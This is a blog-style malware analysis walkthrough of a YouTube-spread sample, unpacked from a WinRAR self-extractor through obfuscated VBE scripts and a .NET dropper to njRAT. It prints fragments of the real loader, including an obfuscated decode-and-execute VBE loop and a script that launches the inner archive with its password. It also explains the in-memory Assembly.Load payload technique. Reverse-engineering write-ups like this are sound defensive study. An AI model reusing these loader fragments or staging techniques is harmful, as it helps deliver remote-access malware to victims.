If your antivirus detects this page as malicious, it is most probably because I have pasted some scripts into the article. Do not be alarmed!
Very recently I've (finally) set up a proper malware analysis VM and so I thought that it would be super fun to download some samples from malware spreaders on YouTube. I came across something interesting from which I have learned and expanded my knowledge and so I thought I'd share my analytical journey with you guys in hopes that you will also learn something!
Author Assigned Level: -
Community Assigned Level:
Nothing extraordinary, these are entirely optional and is not needed to understand the analysis.
- Visual Basic
- C# .NET
- Reverse engineering
- Common sense
VirusTotal - Firestorm.exe
With all things hacking, recon should be the first step towards understanding the target. The first thing I do is upload the sample to VirusTotal (VT) to see if this has already been detected or not, or just to try and get a general overview of what I might be dealing with.
Okay, so there are some detections but it seems to be a pretty generic and it doesn't really help me much.
pestudio - Firestorm.exe
Since VT wasn't helpful, I needed to get a better understanding of what this file is and what it can do. So, using pestudio, I may be able to get some hints.
We can see here there are quite a few flags being raised, most notably:
- it attempts to appear as a Microsoft executable IEXPLORE.exe which is Internet Explorer,
- it seems to have another file within,
- it references file streams so it may write to disk,
- it references cryptographic functions which may indicate some sort of obfuscation
- the debug file name is
sfxrar.pdb which indicates a self-extracting archive, most likely WinRAR.
If we go into the manifest, we can see that it tells us that it's a WinRAR SFX:
File Extraction with WinRAR - Firestorm.exe
Let's open up this archive in WinRAR and see what it contains:
On the right-hand side, we can see the SFX script which details the path to where these files will extract, file execution after unpacking, silent install and file overwriting. Of course the file execution is what grabs our attention so let's extract these files and have a look at them.
pestudio - sfx.exe
So the file name of
sfx.exe gives us a pretty good clue as to what it might be so let's confirm with pestudio:
Yes, as we expected. Can we extract it?
Unfortunately not. So let's continue with
Deobfuscating Visual Basic - form1.vbe
Upon opening the file, this is what we see:
¤½ÊÙÄGS8iwp¡®½¨ßïUbFw~¯¼Ë¶ïG*[i|b ¿Î¶îE*bkT~¯½Î¶ç>Q8iwp¡¯Â¨ÜìT]Fw~¯¼Ë¶ç>T8ivp£²ÎÙÄ?O8ivb§½ËÝÄ?L^F~p¡®À¨Ùæ?*[h~b ¶ÎÞÄFN8iwp¡¯¼¨ÛèO^Fw
©¬ÎÑÖ9<m«¡®¬ÅÈê7<UX´Ç¦½ÊÈá.PSXqtÑô¹üġĘoZfalµÌÐºñü.<7B¬ÉÐÓòõĉĖÖrR¦»}}ÿČÈó._r|Ðå§¤ČĨ.YJ«¸alµÌÐºîċ\_~¢}¤" : PZUO3TWPSQYCGRU="ZUO3TWPSQYCGRU" : CZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) : do until NZUO3TWPSQYCGRU=len(TZUO3TWPSQYCGRU) : NZUO3TWPSQYCGRU=NZUO3TWPSQYCGRU+1 : UZUO3TWPSQYCGRU=UZUO3TWPSQYCGRU+1 : if UZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) then UZUO3TWPSQYCGRU=1
WZUO3TWPSQYCGRU=WZUO3TWPSQYCGRU & ChrW(AscW(Mid(TZUO3TWPSQYCGRU, NZUO3TWPSQYCGRU, 1)) - UZUO3TWPSQYCGRU * CZUO3TWPSQYCGRU) : loop : execute WZUO3TWPSQYCGRU
and what a mess it is. Obfsucation for scripts is a very common thing so it should not come as a surprise. The problem for us is to deobfuscate it somehow. We can see that there is a string which may contain another payload once it has been deobfuscated and some function calls but it's still very confusing and may take us some time to reverse engineer it, especially for people like me who are not quite familiar with Visual Basic.
What's a simple way we can continue without too much effort? On the end of the script, we see an
execute function on the
WZUO3TWPSQYCGRU variable. So let's be smart here and instead of having
execute there we force it to write the contents out to disk! After a quick Google search, it seems we just need to replace it with
WScript.Echo, then call the script using
cscript.exe (important! otherwise it will pop up a message box!). Here is the output:
(The following script has sections removed to prevent AV detection)
MOHMRET = "83101116328711510483104101108108326132878399114105112116466711410197116101799810610199116403487839911410511211646831041011081083441131087115104831041011081084682117110323411510212-04610112010132324511284945643110658211869112841198769693534"
mohar = MOHMRET
MOHMRT = SPLIT(mohar,CHRW(10 + 4))
Yes, indeed it is another payload. Again, we can see it's obfuscated but this time, it's makes a bit more sense. There is another potential payload held in the
MOHMRET variable which looks to be ASCII with some kind of character woven in. We can see the
split function using
MOHMRET) and a character
10 + 4 which may confirm the assumption.
Instead of deobfuscating this file, we want to be smart so similar to the previous script, let's replace
WScript.Echo and see what we get:
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "sfx.exe -pT^8+nARvEpTwWEE#"
There is no more obfuscation and we can see references to
sfx.exe. This script seems to be attempting to execute the other file on the command line with what is most likely the password to the archive. With a quick Google search, WinRAR takes the command line option
-p as a password parameter and with that, we have unlocked a piece of the puzzle.
Here we have yet another auto-run executable called
eze.exe. Let's extract it and perform some more analysis.
pestudio - eze.exe
Looking at the indicators in pestudio, we can see that it fakes itself in order to look like a Microsoft executable. We can also see that it may be a .NET file and looking at the name
WindowsFormsApp1.exe tells us that this project may have taken a default name when it was coded, i.e. a C# Windows Form project.
Moving onto the VT indicators (the sample must already exist on VT), we can see that it may be a dropper:
Let's take a look at the strings since it might provide us with the file names of the file it may drop:
And quite some interesting strings we have here. Greetings, Mr. Stan! If you are reading this, you are violating rule number 5 of the CIA's Development Tradecrafts DOs and DON'Ts. Here's the link, just for you! Don't be surprised if cops show up at the front of your door!
We can confirm the project development under Visual Studio 2017 as we suspected from the default project name. The string that is listed after looks like it may be the location from where the dropper obtains its payload. If we navigate to the page, we get an error:
So it may seem that the file is not a PNG at all, or any type of image file.
dnSpy - eze.exe
We would love to see the file that is dropped by this file and of course it can easily be obtained just by downloading the file but just to spice things up, let's look at how we can get it via dynamic analysis. Open up
eze.exe in dnSpy and let's see what it does.
In the red box, we can see a call to a very common method call
Assembly.Load. This function is mostly used to load a malicious file into memory for execution as indicated by the
EntryPoint.Invoke method call. For an example of this, see @TheDoctor's [C#] A Simple Runtime Crypter article.
To get the binary file, we simply place a breakpoint on this line and run it until it gets hit (mind the sleep at the beginning!)...
... look in the variable's (
array) memory (right-click the variable in the
Locals tab at the bottom, select
Show in Memory Window and then choose a memory view)...
... and there lies the binary we were looking for! Identify the
MZ magic and the
PE\0\0 signatures to verify. Right-click the memory and select
Let's see what VT has for us.
55/67 detections! Identified as
Bladabindi AKA njRAT.
I hope this was an entertaining and educational read! Thanks for stopping by!
The sample can now be obtained here: